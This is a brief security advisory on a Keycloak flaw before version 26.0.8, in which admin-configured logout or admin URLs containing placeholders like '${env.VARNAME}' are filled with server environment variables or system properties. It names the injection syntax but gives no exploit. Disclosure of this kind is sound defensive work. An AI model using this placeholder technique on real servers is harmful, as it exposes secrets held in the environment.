Exposure of Sensitive Information Through Environmental Variables

Summary

A security vulnerability has been identified that allows admin users to access sensitive server environment variables and system properties through user-configurable URLs. Specifically, when configuring backchannel logout URLs or admin URLs, admin users can include placeholders like '${env.VARNAME}' or '${PROPNAME}'. The server replaces these placeholders with the actual values of environment variables or system properties during URL processing. This issue affects org.keycloak version prior to 26.0.8.